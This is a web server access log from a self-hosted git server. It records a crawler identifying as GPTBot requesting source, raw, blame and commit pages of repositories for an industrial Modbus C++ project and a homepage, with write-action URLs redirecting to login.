- GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog" [Client 74.7.227.38] [Length 84652] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:15:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 14087] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" -[17/Feb/2026:15:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26857] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26858] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10288] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 11058] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:15:34:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" -[17/Feb/2026:15:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/js/script.js" -[17/Feb/2026:15:34:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" -[17/Feb/2026:15:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/js/script.js" -[17/Feb/2026:15:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 15856] [Gzip 7.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" -[17/Feb/2026:15:34:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:15:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog" -[17/Feb/2026:15:34:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:15:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog" -[17/Feb/2026:15:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:15:34:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:15:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresWatchdog" -[17/Feb/2026:15:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10288] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:34:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:15:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:15:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" -[17/Feb/2026:15:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 3681] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" -[17/Feb/2026:15:34:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/js/script.js" -[17/Feb/2026:15:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/js/script.js" -[17/Feb/2026:15:34:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/js/script.js" -[17/Feb/2026:15:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/js/script.js" -[17/Feb/2026:15:34:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/About.tsx" -[17/Feb/2026:15:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/About.tsx" -[17/Feb/2026:15:34:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" -[17/Feb/2026:15:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Hero.tsx" -[17/Feb/2026:15:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12361] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12012] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12944] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" [Client 74.7.227.38] [Length 13472] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" [Client 74.7.227.38] [Length 12750] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11167] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12845] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13132] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11611] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12254] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12638] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" -[17/Feb/2026:15:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 